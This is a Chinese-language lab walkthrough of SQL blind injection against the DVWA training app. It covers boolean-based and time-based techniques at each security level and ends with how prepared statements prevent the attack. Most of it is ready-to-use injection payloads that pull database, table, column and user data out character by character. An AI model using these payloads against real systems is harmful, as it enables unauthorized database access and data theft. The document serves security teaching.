目录
简介
sql盲注
SQL Injection(Blind),即SQL盲注;
注入:可以查看到详细内容;
盲注:目标只会回复是或不是,没有详细内容;
SQL盲注的类型
基于布尔值的盲注;
基于时间的盲注;
基于报错的盲注;
安全级别:Low
查看源码
源码分析
代码对参数id没有做任何检查、过滤,存在明显的SQL注入漏洞;
同时SQL语句查询返回的结果只有两种:
User ID exists in the database;User ID is MISSING from the database;
单引号注入
基于布尔盲注
数据库名
数据库的长度
1' and length(database())=4 #
数据库名字
1' and ascii(substr(database(),1,1))=100# //d
1' and ascii(substr(database(),2,1))=118# //v
1' and ascii(substr(database(),3,1))=119# //w
1' and ascii(substr(database(),4,1))=97# //a
表名
表的个数
1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=2#
每个表的长度
1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=9#
1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=5#
表名
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=103# //g
......
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),9))=107# //k
最后得出第一个表名为guestbook
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=117# //u
…
最后得出第二个表名为users
字段
判断有几个字段
1' and (select count(column_name) from information_schema.columns where table_name='users')=8#
判断第一个字段的长度(user_id)
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7#
字段的名称(user_id)
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=117#
字段值
1' and ascii(substr((select user from users limit 0,1),1,1))=97#
基于时间的注入
和基于布尔类似
数据库名
数据库长度
1' and if(length(database()) =4,sleep(5) ,1)#
数据库名字
1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)# //d
表名
表的个数
1' and if((select count(table_name) from information_schema.tables where table_schema='dvwa')=2,sleep(5),1)#
表的长度(guestbook——9,users——5)
1' and if(length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=9,sleep(5),1)#
1' and if(length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=5,sleep(5),1)#
表名(guestbook,users)
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=103,sleep(5),1)# //g
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),9))=107,sleep(5),1)# //k
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=117,sleep(5),1)#
字段名(users)
字段数
1' and if((select count(column_name) from information_schema.columns where table_name='users')=8,sleep(5),1)#
字段的长度(以user_id为例)
1' and if(length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7,sleep(5),1)#
字段的名称(以user_id中的u为例)
输入 1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=117,sleep(5),1)# //u
字段值
1' and if(ascii(substr((select user from users limit 0,1),1,1))=97,sleep(5),1)#
安全级别:Medium
查看源码
源码分析
可以看到,Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,,’,”,\x1a进行转义;
同时设置了下拉选择表单,控制用户的输入;
可以简单看出,用户只能选择1-5,存在数字型SQL注入;
使用burpsuit进行抓包,和上面的过程一样
安全级别:High
查看源码
源码分析
High级别在SQL查询语句中添加了LIMIT 1,以此控制只输入一个结果;
虽然添加了LIMIT 1,但是我们可以通过#将其注释掉;
在High级别中,不适合用基于时间的盲注,因为High级别的源码中显示,不论猜解正确或者错误,都会sleep(rand(2,4));
安全级别:Impossible
查看源码
源码分析
Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入;
同时只有返回的查询结果数量为1时,才会输出;